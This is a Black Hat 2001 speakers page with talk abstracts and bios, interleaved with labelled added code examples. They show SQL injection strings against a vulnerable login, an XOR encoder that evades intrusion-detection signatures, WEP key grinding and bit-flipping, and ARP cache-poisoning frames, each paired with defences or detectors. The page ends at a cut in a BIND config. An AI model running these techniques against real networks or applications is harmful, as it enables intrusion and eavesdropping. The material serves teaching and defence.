The Black Hat Briefings '01, July 11-12th Las Vegas

SPEAKERS

The Black Hat Briefings is Wednesday July 11th  to Thursday July 12th 

07/06/2001 : All available material is on-line.  Updated materials and missing presentations will be posted as soon as they become available.

 
Key Note Speakers
William Tafoya
Kevin Manson

Career Routing for the Ethical Code

This presentation will address the following issues:
o Trusted Software Used to Enhance Public Safety.
o Protecting & Serving on the Matrix with Apologies to John Quarterman.
o Who are the Elite, the Attackers or the Defenders?
o Plato's Republic in Cyberspace: Why It's Important to be a Responsible Netizen.
o Where are the Greenhouses That Nurture Ethical Hackers?
o Enlisting a Cyber Civil Defense Corps.
o CyberCorp Scholarships: Where Do I Apply?

Dr. William Tafoya: For the past three years, Dr. Tafoya has been Professor of Criminal Justice at Governors State University. Previously he was Director of Research, Office of International Criminal Justice, University of Illinois at Chicago. He is a retired Special Agent of the Federal Bureau of Investigation.

For 12 months (July 1989 to July 1990), he served as Congressional Research Fellow for the 101st Congress in Washington, DC. There he conducted research on police use of high technology as well as future crime. He remains the only law enforcement officer ever selected to serve in this capacity on behalf of the U. S. Congress. He has guest lectured at numerous universities and various venues internationally. In 1991 he founded the Society of Police Futurists International. Prior to his retirement from the FBI in June 1995, he was assigned in Washington, DC, Quantico, Virginia, and San Francisco, California. Dr. Tafoya served for 11 years at the FBI Academy as a senior faculty member of the Computer Crimes Training and Behavioral Science Units.

He was the first law enforcement officer to make investigative use of the Internet. He created the UNABOMber web site in December 1993. It was generated on a NASA computer because at that time the FBI did not have the capability to implement Bill's ideas on its own computer system. Bill subsequently developed the FBI's Oklahoma City Bombing web page in April 1995. At Governors State University Dr. Tafoya teaches courses in Computer Crime Investigation, Research Methods and Statistics, as well as Strategic Planning. His current research interests are in CyberTerrorism and the application of Virtual Reality for training of law enforcement officers.

His 1986 Ph.D. in Criminology is from the University of Maryland; it was a forecast of the future of law enforcement. He was recently appointed an advisor to the National Cybercrime Training Partnership of the U. S. Department of Justice. Both the print and electronic media have interviewed him extensively nationally and internationally. Twice he has been featured in U. S. News & World Report. More recently he was featured in the April 2001 issue of Information Security.

Kevin Manson: Kevin Manson serves as a Senior Instructor with the Financial Fraud Institute at the Federal Law Enforcement Training Center (FLETC). In 1993, while an instructor with the FLETC Legal Division, he pioneered Internet training for the federal law enforcement community and created FLETC's first major computer security training component in 1997 ("Digital Officer Safety") as well as deploying the first working use of wireless networking in a FLETC training program.

He is the founder of a Virtual Private Network, "Cybercop Secure Communities", which is networking the corporate and law enforcement worlds to strengthen our nation's "Cyber Civil Defense" as contemplated by Presidential Decision Directive 63. His personal interests include the impact of technology on society, promoting industry and law enforcement cooperation in information age security and policing and use of Internet technology to deliver secure distance learning materials over the Internet to the laptops, palmtops and (future) wearable computers of those who serve behind the "thin digital blue line".

Dr. Tafoya and Mr. Manson will be giving a press conference to Black Hat credentialed journalists from 9:15am - 9:45am in the press room.


James Bamford, Author of The Puzzle Palace & Body of Secrets

Researching Secrets, Part II

BOOKS: The Puzzle Palace:  A Report On NSA, America's Most Secret Intelligence Agency. (Houghton Mifflin and Viking Penguin)  An investigation of the largest, most hidden and most important U.S. intelligence agency. The book became a national bestseller and won the Investigative Reporters and Editors Book-of-the-Year Award.  In February 1998 Washingtonian magazine called it a monument to investigative journalism. 
Body of Secrets: Anatomy of the Ultrasecret NSA, From the Cold War to the Dawn of a New Century.  (Doubleday)  A sequel to The Puzzle Palace, the new book takes a close look at NSA from the Cuban Missile Crisis and Vietnam to the present controversy over Echelon.  (Due out in April 2001).

TELEVISION: Washington Investigative Producer, ABC News, World News Tonight with Peter Jennings.  For nine years, until 1998, I was responsible for long-term, in-depth investigative stories from concept to final airing.  The stories have covered a wide range in both topics and geography, from White House scandals to locating spies in Cold War Europe to finding murderers in the Middle East.  Many involved complicated investigations in difficult areas of the world, such as locating principal figures involved in the Clinton campaign finance scandal hiding from U.S. authorities in China.  I am also the recipient of numerous television reporting awards, including the Overseas Press Club Award for Excellence and the Society of Professional Journalists Deadline Award for the Best Investigative Reporting in Television.

MAGAZINES: I have written on investigative topics for many national magazines, including the cover story on the Iran-contra affair for the New York Times Magazine, the cover on the Russian shoot down of Korean Air Lines 007 for The Washington Post Magazine and the cover on the Mafia for the Los Angeles Times Magazine.

CRITICISM: I have written dozens of op ed pieces and book reviews for the New York Times, The Washington Post, and the Los Angeles Times.

CONGRESS: I have testified on intelligence and secrecy issues before committees of both the U.S. Senate and House of Representatives.


Technical Speakers
Steven M. Christey, The MITRE Corporation

CVE Behind the Scenes: The Complexity of Being Simple

CVE, the Common Vulnerabilities and Exposures list, is just a collection of unique numbers, ridiculously terse descriptions, and a hodgepodge of references.  Isn't it?  To most people, CVE looks quite simple.  And it is, by design.  But simple doesn't always mean easy. I'll delve into some of the roadblocks faced during the short life of "the little list that could."

When David Mann and I proposed the CVE concept to the Vulnerability Database Workshop at Purdue CERIAS in January 1999, we outlined the following major criteria for a good CVE:

  - enumerate and discriminate between all known vulnerabilities
  - assign a standard, unique name to each vulnerability
  - exist independently of the multiple perspectives of what a vulnerability is
  - be publicly "open" and shareable without distribution restrictions

I'll discuss the challenges that MITRE and the CVE Editorial Board face in trying to satisfy these criteria, including:

  - what we got wrong in those early days
  - the terminological warfare that forced CVE to change its name
  - how CVE has taxonomical features even though we claim that it's not a taxonomy
  - how CVE, which supposedly isn't a database, encounters various problems that full-fledged vulnerability databases do
  - why some candidates have been around for two years - and why some might stay that way forever
  - the bureaucratic process for creating official CVE entries that nonetheless has its advantages
  - what's being done about IDS
  - how CVE can simultaneously suffer from too much information and too little information
  - how CVE entries themselves have evolved over time, and how they publicly reflect the education of a vulnerability analyst
  - why it's impossible to please everyone at the same time
  - how having CVE could have helped in the construction of CVE
  - the buzzword-compliant techniques that support the population and search of CVE
  - what's being done about the delays between the initial public announcement of a security problem and the assignment of a candidate number
  - how there really isn't a CVE "behind the scenes"
  - and whatever else I (or you) feel like talking about

Steve Christey is a Lead INFOSEC Engineer in the Security and Information Operations Division at The MITRE Corporation.  After joining MITRE in 1989, he initially conducted research in artificial intelligence (AI), moving into the information security arena in 1993. He was the primary security auditor for MITRE's networks from 1994 to 1999, conducting network-based risk assessment, management, and incident response.  Since 1997, he has conducted research which blends his experience in AI and security, in topics such as automated vulnerability analysis of source code, reverse engineering of executable code, and distributed security assessment.  From 1999 to  the present, he has been the editor of the Common Vulnerabilities and Exposures (CVE) list, and the Chair of the CVE Editorial Board. Mr. Christey holds a B.S. in Computer Science from Hobart College.


Chip Andrews, independent computer security consultant

SQL Security revisited.

As organizations get better at configuring firewalls and intrusion detection systems, what may be left out of the security equation is database server security.  As Microsoft's flagship relational database product and with chart-topping TPC benchmarks, SQL Server is poised to serve as the backbone of many corporate and eCommerce infrastructures.  With all of these SQL Server installations around, who is going to secure them?  How SQL Server security conscious are the people developing the products?  How can SQL Server be transformed from a vessel of your corporate jewels into an injection vector for exploits, rootkits, and other shenanigans?

The SQL Server security presentation will begin with an overview and evolution of the SQL Server security model.  Discussion will include the differences between users and logins, database and server roles, SQL Server service security contexts, and the security of the various net-libs.  There will also be some discussion of the scope of SQL Server's enterprise presence as it has found its way into numerous commercial products that may exist in multiple locations of many shops.

The following section will describe typical SQL Server fingerprinting, information gathering, account acquisition, and privilege escalation techniques used by attackers.  There will be some discussion of the various tools available to the general community to both attack and defend SQL Server installations.  Finally, there will be a clear suggestion for how SQL Server administrators and developers can defend against these attacks including doing some intrusion detection on SQL Server itself.

The final section will discuss the growing problem of SQL-injection attacks and how they affect SQL Server specifically.  There will be a demonstration of exactly how attackers inject SQL code into applications and the tricks they use to bypass even the most vigilant input validation.  Best practice development techniques will be demonstrated and how even ad-hoc queries might be better constructed as to not let attackers inject trojan SQL code into your applications.
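Added example, not from the talk or from Chip Andrews' own material: the ad-hoc string-built login query beside its parameterised replacement, plus the numeric-context case that quote escaping alone does not cover. Python's sqlite3 module is used as a portable stand-in for SQL Server; the users table, credentials and injection strings are constructed for the example. One difference worth knowing: sqlite3's execute() refuses stacked statements, so the `'; EXEC ...` style of stacked injection that SQL Server's batch parsing allows is not reproduced here.

```python
import sqlite3

# Constructed sample data standing in for an application's login table.
# sqlite3 is a portable stand-in for SQL Server; the concatenation bug and
# the parameterised fix look the same against either engine.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "s3cret", 1), ("bob", "hunter2", 0)])
    return con

def login_vulnerable(con, user, pw):
    """Ad-hoc query built by string concatenation: attacker text becomes SQL.
    user = "alice'--" comments out the password check; pw = "' OR '1'='1"
    makes the WHERE clause true for every row."""
    sql = ("SELECT name FROM users WHERE name = '" + user +
           "' AND password = '" + pw + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con, user, pw):
    """Parameterised query: the same values are bound as data, never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = con.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None

def escape_quotes(s):
    """The usual 'input validation' fix: double every single quote."""
    return s.replace("'", "''")

def find_by_id_escaped(con, id_text):
    """Quote escaping does nothing in a numeric context: there are no quotes
    to escape, so "99 OR is_admin = 1" is still injected as SQL."""
    sql = "SELECT name FROM users WHERE rowid = " + escape_quotes(id_text)
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def find_by_id_safe(con, id_text):
    """Validate the type, then bind: anything that is not a plain integer is rejected."""
    if not id_text.isdigit():
        return None
    sql = "SELECT name FROM users WHERE rowid = ?"
    row = con.execute(sql, (int(id_text),)).fetchone()
    return row[0] if row else None
```

The second pair is the point about "even the most vigilant input validation": escaping quotes only helps where the value lands inside a string literal. Binding parameters (or, in SQL Server, sp_executesql with typed parameters) removes the question of what the value lands in.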

Chip Andrews (MCDBA, MCSE+I) has been a programmer (currently VB/SQL/Java/C++) and an independent computer security consultant for more than 16 years and specializes in applying the skills obtained through security consulting to every aspect of product development.  Chip maintains the sqlsecurity web site that focuses on SQL Server security issues.  He currently works as a Software Security Architect for Clarus Corporation, a leader in B2B e-Commerce software applications.


Timothy Mullen, AnchorIS.Com

Grabbing User Credentials via W2k ODBC Libraries

Timothy Mullen is CIO and Chief Software Architect for AnchorIS.Com, and develops secure enterprise-level accounting software products and procedures.


Tim Newsham

Cracking WEP Keys

In this talk, Tim Newsham will apply the techniques of password cracking to the Wired Equivalent Privacy (WEP) protocol used to secure 802.11 traffic. The presentation will cover the basics of the WEP protocol and how keying material is configured and then illustrate techniques to perform traditional password grinding on the keys.  A weakness in one of the key generators that permits very fast recovery of keys will also be discussed.

Timothy Newsham is a computer security researcher with @Stake with interests in networking protocols and UNIX system security.  He received his Bachelor of Science in Electrical Engineering at the University of Hawaii and his Master's in Computer Science at the University of Arizona.  Tim has developed computer security products for Internet Security Systems, Secure Networks and Network Associates and held a research position at Guardent in the past.  He is perhaps best known for his papers "The Problem with Random Increments" which he wrote while at Guardent, and "Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection" which he co-authored with Thomas Ptacek while at Secure Networks.


Job de Haas, ITSX

GSM / WAP / SMS Security.

Job de Haas, like many others in the IT and Internet industry, started his career in another technical field. Shortly before finishing his Electrical Engineering studies, in 1991, he came into contact with the Internet. From that moment on, he's been interested in computer security. 

In the beginning this interest was a hobby, albeit a very time consuming one. This was noticed by the first Internet providers that started to appear in The Netherlands. Their systems were almost never secure, and Job cleverly used their offers to give him free Internet access in trade for pointing out security flaws in their systems. This exercise in breaking security has proved to be an invaluable asset when protecting systems, since one can only protect what one can crack. 

Apart from this, Job has been a cryptographic programmer at DigiCash, which has developed a cryptographically secure anonymous payment system for the Internet. 


Chad R. Skipper, Sr. Software Engineer - Symantec Corporation

Polymorphism and Intrusion Detection Systems 

As the Internet and corporate networks continue to evolve and grow, much of the conventional wisdom associated with computer security will continue to be challenged, changed, and in some cases will become obsolete. This presentation discusses the effects of polymorphic attacks on networks.  It is important to note that the polymorphic algorithms used to craft malicious attacks are specifically designed to evade common techniques used by Network Intrusion Detection Systems (NIDS). While the use of malicious polymorphic code is not new, we are beginning to see a paradigm shift from polymorphic viruses to polymorphic attacks. 

This presentation will include a description of polymorphic attacks, to include the paradigm shift, encoding process, evasion techniques, TCPDump of polymorphic sessions, and the possible remedies of Intrusion Detection Systems.
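Added example, not from the talk: a byte-level model of a polymorphic encoding and of the two detection approaches it sorts apart. Real polymorphic attack code carries an x86 decoder stub; here the decoder is a Python function, the attack string and the signature are constructed, and the wire layout (junk length, junk, key, XOR-encoded payload) is an assumption made for the example.

```python
import os

# Constructed sample: the attack string a NIDS content signature is written against.
PAYLOAD = b"/bin/sh -c 'id'"
SIGNATURE = b"/bin/sh"

def xor_encode(payload, key=None, junk=None):
    """Encode one attack instance: [junk length][junk bytes][key][payload XOR key].
    A fresh key and fresh junk per session mean no two instances share the
    signature bytes on the wire."""
    if key is None:
        key = 1 + os.urandom(1)[0] % 255   # never 0, which would leave the payload in clear
    if junk is None:
        junk = os.urandom(os.urandom(1)[0] % 16)
    body = bytes(b ^ key for b in payload)
    return bytes([len(junk)]) + junk + bytes([key]) + body

def xor_decode(blob):
    """What the decoder stub does on the target: skip the junk, read the key, XOR back."""
    n = blob[0]
    key = blob[1 + n]
    return bytes(b ^ key for b in blob[2 + n:])

def signature_match(data, sig=SIGNATURE):
    """Plain content signature: matches the clear payload, misses every encoded instance."""
    return sig in data

def xor_signature_match(data, sig=SIGNATURE):
    """The NIDS side answer to single-byte XOR encoding: try all 256 keys and
    look for the signature under each. Returns the key found, or None."""
    for k in range(256):
        if bytes(b ^ k for b in sig) in data:
            return k
    return None
```

The encoded stream never contains the signature, so a static rule is blind to it; the 256-key search costs 256 substring scans per packet and is the simplest of the "decode before matching" remedies the talk refers to. Multi-byte keys and real decoder stubs raise that cost, which is why the practical signature is usually written against the decoder rather than the payload.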
 

Chad has eight years of experience in systems engineering, network security, network design, and Internet design using various operating systems.  Chad holds a Bachelor's degree in Computer Information Systems and has the MCSE, MCP+I, CCNA, and Solaris certifications.  During his four years enlisted in the Air Force, Chad built and secured several LAN and WAN networks and was involved with information systems counter-intelligence, OSI investigations, information warfare, and exploit intelligence.  After the Air Force, Chad joined Trident Data Systems, where he integrated UNIX and NT into a secure environment.  Chad then joined L-3 Network Security as the Exploitation Engineer, where he researched, developed, verified, and documented new vulnerabilities and exploitation techniques for a variety of communications platforms.  L-3 Network Security was acquired by Symantec, where today Chad runs a signature development team for host- and network-based intrusion detection signatures.


Robert Hansen

Hardening .htaccess scripts in Apache environments.

Htaccess is an out-of-the-box method to secure portions of a website with a username/password combination.  Several solutions, both theoretical and practical, will be presented for hardening htaccess authentication.  In its natural form it has serious flaws, which will be explained in detail.  In addition, a variation on Morris' attack will be used to show one method of breaking the IP-based authentication used by many of the third-party on-line credit card clearing companies.

Robert, known formerly as RSnake and currently as RSenic, has worked for a major banner advertising company as an Information Specialist and for several start-up companies as Chief Operations Officer and Chief Security Officer.  He devised a method by which to make credit card clearing faster, more secure, and save large amounts of transaction costs.  He successfully negotiated a bridge financing round.  He has founded several security sites and organizations, and has been interviewed by many international magazines, newspapers, and television networks.


Andrew van der Stock, Senior Architect - e-Secure

Alternatives to honeypots or the dtk

Honeypots have a long history and an undeserved high profile in the security industry. Andrew discusses flaws with honeypots, and with popular sites like honeynet that host honeypots, from a technical and risk perspective. However, as their use is moderately common at many sites, a safer replacement should be found.

Andrew will be introducing a new passive intrusion detection tool to assist with providing advanced sites with additional information they require to track down careless attackers. In addition, common sense security advice is given to help reduce the risk profile for the majority of sites.

Andrew van der Stock is a Senior Architect at e-Secure, one of Australia's largest IT specialist security consultancy firms. e-Secure only delivers their core competency: consultancy services, and do not align themselves with any vendor. Andrew has been in security for over six years, and in IT for over eleven. He is a NT/2k/XP sorta guy (dual MCSE, fwiw (not much)), with a strong open source background. He helped develop the matrox drivers in XFree86 and is the current maintainer of pnm2ppa, which allows Unix people to print to HP's worst-ever printers.

Andrew sits on a government panel on the future of DNS competition in Australia, giving technical and security advice (he is one of three tech dudes on a panel of 30, and the only unbiased one ;-). He is the current immediate past President of SAGE-AU.


Cory Scott, Lead Security Consultant - Securify, Inc.

Systems Management in an Untrusted Network: Dealing with backups, monitoring, administration, and logging in the DMZ

Throughout the progression of networked systems from mainframe computing to the Internet world of today, the solutions available to system and network administrators for handling core tasks have also progressed. Applications and protocols for backups, logging, remote access, and monitoring have gotten easier to use, quicker to deploy, and commercially supported. However, these solutions don't necessarily take security into account. While the risk presented by deploying a systems management application with poor security may be mitigated when it is deployed in an internal network, the risk may not be acceptable in an untrusted network or DMZ environment. One only needs to look as far as the ongoing exploit of SNMP vulnerabilities on Internet-accessible hosts to see where the risk management failed. Nonetheless, administrators must keep a careful balance between security and convenience, as the management solutions save time and reduce downtime.

The goal of this presentation is to discuss how to implement systems management components in untrusted or semi-trusted networks with an eye towards security. Solutions for backups, monitoring, administration, and logging will be discussed. Network architectures that support a secure deployment of these solutions will be presented and evaluated. General tips and techniques for deploying applications for systems management will be presented.

Cory Scott has over six years of experience in network and systems security architecture. As a lead security consultant at Securify, he performs in-depth technically oriented tasks for his clients, including secure architecture design, configuration review, incident response, and protocol analysis. Some of his previous engagements have included network and system architecture reviews, in-depth application review and design work, operational and procedure reviews, and emergency response for internal and external incidents for financial institutions, healthcare organizations, security software companies, and e-commerce companies. He is also the Acting Chief Security Officer for Securify, responsible for building an internal security office for Securify's Managed Security Service offering, as well as general corporate security.

He has written on security issues for Windows NT Systems magazine and securityfocus.com. He is also a technical editor, editing books on networking, systems, and security for Macmillan, Osborne, and O'Reilly.


Blake

DOG of WAR: Attack Box Design

This presentation is geared for those who build scanner and attack boxes for companies and personal use. I will also cover some of the different methods I use in performing Security Audits as an Independent and elaborate on some previous Penetration Testing projects, including Rooting the Attacker.  With time provided and forum interest, I would like to show you some Hacking demos, including ones in which I have been hacked. 

Blake is an Independent Internet Consultant based in the San Jose / San Francisco area. He has conducted hundreds of on-site surveys involving network/system integration and design for a variety of projects and companies, domestically as well as internationally. Technologies include Internet security, online banking, backbone infrastructures, data centers, ISPs, ASPs, dot-coms, state and local government communications, ATM, SONET, microwave, RF, satellite transmissions, etc.

More Technical
Ian Goldberg, Zero-Knowledge Systems

The Insecurity of 802.11: An analysis of the Wired Equivalent Privacy protocol

The 802.11 standard for wireless networks includes a Wired Equivalent Privacy (WEP) protocol, used to protect link-layer communications from eavesdropping and other attacks.  We have discovered several serious security flaws in the protocol, stemming from misapplication of cryptographic primitives.  The flaws lead to a number of practical attacks that demonstrate that WEP fails to achieve its security goals.  In this talk, we will discuss in detail each of the flaws, the underlying security principle violations, and the ensuing attacks.
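Added example serving both this talk and Tim Newsham's "Cracking WEP Keys" above; none of it is the speakers' code. It implements WEP's RC4 encapsulation and CRC-32 ICV, the passphrase-to-40-bit-key generator found in many vendor client utilities of the time (its algorithm is taken as an assumption here), dictionary grinding of a captured frame against that generator, and the keyless bit-flip that the CRC's linearity permits. The key, IV, wordlist and frame are constructed; nothing is captured from the air.

```python
import zlib

def rc4(key, data):
    """RC4 as WEP uses it: per-packet key = IV || shared key, no keystream discarded."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data):
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(key, iv, plaintext):
    """WEP frame body: IV (3 bytes) | key id (1) | RC4(IV||key) XOR (plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))

def wep_decrypt(key, frame):
    """Returns the plaintext if the ICV verifies under this key, else None."""
    iv, ct = frame[:3], frame[4:]
    body = rc4(iv + key, ct)
    pt, tag = body[:-4], body[-4:]
    return pt if icv(pt) == tag else None

def wep40_keygen(passphrase):
    """Assumed passphrase-to-key generator, as commonly implemented in vendor
    utilities of the time: XOR the passphrase bytes into a 32-bit seed, then
    draw four 5-byte (40-bit) keys from a linear congruential generator."""
    seed = 0
    for i, c in enumerate(passphrase.encode()):
        seed ^= c << (8 * (i & 3))
    keys = []
    for _ in range(4):
        k = bytearray()
        for _ in range(5):
            seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
            k.append((seed >> 16) & 0xFF)
        keys.append(bytes(k))
    return keys

def grind_passphrase(frame, wordlist):
    """Password grinding against one captured frame: derive the candidate keys
    from each word and keep the first key whose ICV verifies."""
    for word in wordlist:
        for key in wep40_keygen(word):
            if wep_decrypt(key, frame) is not None:
                return word, key
    return None

def flip_bits(frame, offset, mask):
    """Keyless modification. CRC-32 is linear, so for a delta D of the data
    length, crc(P xor D) = crc(P) xor crc(D) xor crc(0...0). XOR D into the
    ciphertext and the matching correction into the encrypted ICV; the
    receiver's ICV check still passes and the plaintext byte at offset
    has been changed by mask."""
    ct = bytearray(frame[4:])
    n = len(ct) - 4
    delta = bytearray(n)
    delta[offset] = mask
    for i in range(n):
        ct[i] ^= delta[i]
    fix = bytes(a ^ b for a, b in zip(icv(bytes(delta)), icv(bytes(n))))
    for i in range(4):
        ct[n + i] ^= fix[i]
    return frame[:4] + bytes(ct)
```

Usage: derive a key with wep40_keygen("secret")[0], encrypt a frame under it with a fixed IV, then call grind_passphrase over a wordlist containing "secret" and flip_bits on the result. The grinding loop is only as fast as the generator is weak: the talk's point is that this generator's output space is far smaller than 40 bits, so a dictionary (or an exhaustive walk of the generator's seeds) finishes quickly; the bit-flip needs no key at all, which is the misapplication of an unkeyed, linear checksum that the Berkeley analysis describes.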

Dr. Ian Goldberg is internationally recognized as one of the world's leading cryptographers and cypherpunks.  Dr. Goldberg is a founder of Berkeley's Internet Security, Applications, Authentication and Cryptography group. In addition to developing many of the leading network software titles for the Palm Pilot, he is known for his part in cracking the first RSA Secret Key Challenge in three and a half hours; breaking Netscape's implementation of the encryption system SSL; and breaking the cryptography in the GSM cellular phone standard. In November 1998, Wired magazine selected Dr. Goldberg as one of the "Wired 25" - the twenty-five people who in 1998 are "about to change the rules all over again." In December 2000 he obtained his Ph.D. from UC Berkeley for his thesis "A Pseudonymous Communications Infrastructure for the Internet," which examined the technical and social issues involved in designing the Freedom Network.


Mike Beekey, Senior Manager - Deloitte & Touche

ARP Vulnerabilities: Indefensible Local Network Attacks?

ARP may be one of the most used but least respected protocols, allowing two devices to establish communications with each other across a network. Unfortunately, even with its critical role of mapping logical addresses to physical addresses, ARP is inherently susceptible to a variety of spoofing attacks within local subnets.  While there have been discussions surrounding this issue and tools written to take advantage of these features, its potential to cause nearly indefensible denial of service attacks with minimal effort appears to still be understood by only a few.

This presentation assumes some familiarity with ARP and will only briefly review the basics.  We will discuss the vulnerabilities and a variety of common attack tactics, such as turning your expensive network switch into a dumb hub, sniffing, and performing session hijacking.  We will then discuss some more unfriendly techniques including preventing individuals from accessing network resources, stopping kiddies from performing network scans, and best or worst of all, bringing all local network connectivity to a complete halt.  In addition, we will clear up some prevalent misconceptions about potential defenses and countermeasures, vulnerable systems and devices, and methods for detecting and reacting to these attacks.  Lastly, we will discuss and demonstrate testing methods, exploit techniques, and countermeasures using several custom tools.

Mike is a senior manager at Deloitte & Touche and has been working in the computer security area for over eight years.  Mike has extensive experience in performing manual penetration and vulnerability testing in a variety of environments.  His particular focus and interest is in network protocols, and ways to manipulate them for various attacks and abuse of network devices and IDS systems.  Mike has worked as a consultant for a variety of commercial clients, as well as federal and civilian government agencies.


Daiji Sanai, Manager - Security Friday.

Promiscuous node detection using ARP packets

Packet sniffing is a serious security issue for a local network.  Malicious users on a local network can capture nearby users' data by running a sniffer on a PC, and since just about anyone can easily install and operate one, the threat is especially dangerous. I will discuss a technique to detect promiscuous nodes on local networks. It is a very practical method, because it does not greatly increase the load on the network and it can list suspect nodes in a short amount of time. The technique is effective against the common operating systems Windows and Linux.

I will explain the technique used for promiscuous-node detection with ARP packets. In addition, I will explain the three layers involved in detection: hardware filters, software filters, and the ARP mechanism itself.
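Added example, not from either talk, covering Mike Beekey's ARP spoofing and the promiscuous-node probe described here: frame construction and parsing, the unsolicited reply that poisons a victim's cache, a passive binding-change detector, and a simulation of the three filter layers that shows why only a promiscuous host answers a request sent to a fake broadcast MAC. The filter model is a simplified, Linux-like assumption; which destination addresses a given OS actually answers is exactly what the talk examines and is not claimed here. MAC and IP addresses are constructed; nothing is sent on a real interface.

```python
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
BROADCAST = bytes.fromhex("ffffffffffff")
FAKE_BROADCAST = bytes.fromhex("fffffffffffe")  # probe address: broadcast with the last bit cleared
ARP_REQUEST, ARP_REPLY = 1, 2

def mac(text):
    return bytes.fromhex(text.replace(":", ""))

def build_arp(dst, src, op, sha, spa, tha, tpa):
    """Ethernet header followed by an ARP body (RFC 826 layout, IPv4 over Ethernet)."""
    eth = dst + src + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + sha + IPv4Address(spa).packed + tha + IPv4Address(tpa).packed)
    return eth + arp

def parse_arp(frame):
    """Returns the ARP fields as a dict, or None for a non-ARP or malformed frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    b = frame[22:42]
    return {"dst": frame[:6], "src": frame[6:12], "op": op,
            "sha": b[:6], "spa": str(IPv4Address(b[6:10])),
            "tha": b[10:16], "tpa": str(IPv4Address(b[16:20]))}

def poison_reply(attacker_mac, victim_mac, victim_ip, spoofed_ip):
    """The poisoning frame: an unsolicited reply telling the victim that
    spoofed_ip (say, the gateway) lives at the attacker's MAC."""
    return build_arp(victim_mac, attacker_mac, ARP_REPLY,
                     attacker_mac, spoofed_ip, victim_mac, victim_ip)

class ArpWatch:
    """Passive detector: remember sender IP -> MAC bindings seen on the wire and
    report any binding that changes (the arpwatch idea)."""
    def __init__(self):
        self.table = {}

    def observe(self, frame):
        p = parse_arp(frame)
        if p is None or p["spa"] == "0.0.0.0":   # ignore probes with no sender address
            return None
        old = self.table.get(p["spa"])
        self.table[p["spa"]] = p["sha"]
        if old is not None and old != p["sha"]:
            return "%s moved from %s to %s" % (p["spa"], old.hex(":"), p["sha"].hex(":"))
        return None

def promisc_probe(my_mac, my_ip, target_ip):
    """Detection probe: an ordinary ARP request for target_ip, but addressed to
    the fake broadcast MAC instead of ff:ff:ff:ff:ff:ff."""
    return build_arp(FAKE_BROADCAST, my_mac, ARP_REQUEST,
                     my_mac, my_ip, bytes(6), target_ip)

def host_replies(frame, own_mac, own_ip, promiscuous, multicast=()):
    """Simplified, Linux-like model (an assumption) of the three filter layers.
    Hardware: own unicast, true broadcast, or a subscribed multicast group;
    a promiscuous card passes everything. Software: the stack classifies the
    frame by destination, drops unicast frames that are not ours, but keeps
    anything with the group bit set. ARP: answer if the target IP is ours."""
    p = parse_arp(frame)
    if p is None or p["op"] != ARP_REQUEST:
        return False
    dst = p["dst"]
    group = bool(dst[0] & 1)
    hw_ok = promiscuous or dst == own_mac or dst == BROADCAST or (group and dst in multicast)
    if not hw_ok:
        return False
    if not group and dst != own_mac:
        return False
    return p["tpa"] == own_ip
```

The probe works because the two filters disagree: the card's hardware filter compares all 48 bits of the destination and drops ff:ff:ff:ff:ff:fe, while a promiscuous card hands it up and the kernel, seeing the group bit set, treats it as worth answering. ArpWatch is the detection side of the poisoning attack; it cannot stop the first forged reply, which is the "indefensible" part, but it reports every binding change with both MACs, and that is what the countermeasure discussion starts from.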

Daiji Sanai is an expert in the field of network security and the manager of SecurityFriday.com.  SecurityFriday researches the security of local networks and is very knowledgeable in the areas of Ethernet-layer security and Windows authentication. In his free time he specializes in private information security and web user security.


Marshall Beddoe, Research and Development Engineer with Foundstone, Inc.
Chris Abad, R&D Engineer with Foundstone, Inc.

The Siphon Project: An Implementation of Stealth Target Acquisition and Information Gathering Methodologies 

This new approach to information gathering is the latest in stealth target acquisition technology. This lecture will discuss dynamic routing protocol internals, network mapping methodology, vulnerability analysis techniques, and OS identification procedures. Come prepared for an in-depth compare/contrast session between active and passive network information gathering heuristics. We make informed target acquisition notoriously fun and difficult to detect.

Christopher Abad, an R&D Engineer with Foundstone, Inc., is currently studying mathematics at UCLA and has also done considerable research in the security industry including pioneering work in the concepts of passive network mapping. He has given various presentations on this subject at security conferences including Defcon. You can reach Chris at chris@gravitino.net

Marshall Beddoe is a Research and Development Engineer with Foundstone, Inc.  He has performed research in the areas of passive network mapping, remote promiscuous detection, FreeBSD internals and new exploitation techniques with multiple non-profit security groups.  Marshall also developed and presented lectures on advanced penetration techniques for the U.S. Military and various Fortune 500 companies.  You can reach Marshall at marshall@gravitino.net.


Jay Beale, Security Team Director - MandrakeSoft

Attacking and Defending BIND / DJBDNS DNS Servers

This talk runs in the Attack and Defense format: we explain what the traditional attacks against name servers have been and how to harden your setup to defend against them.  The methods range from refusing queries from the "wrong" hosts, to chrooting servers, to setting up split-horizon DNS / firewalling configurations.
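Added configuration example, not from the talk: a BIND 9 named.conf fragment that applies the hardening steps listed above. The zone name, the addresses (RFC 5737 documentation ranges standing in for the internal LAN and the secondaries) and the file names are assumptions.

```conf
// Refusing queries from the wrong hosts: the ACL is referenced below,
// so it must be declared first.
acl internal { 127.0.0.1; 192.0.2.0/24; };

options {
    directory "/var/named";
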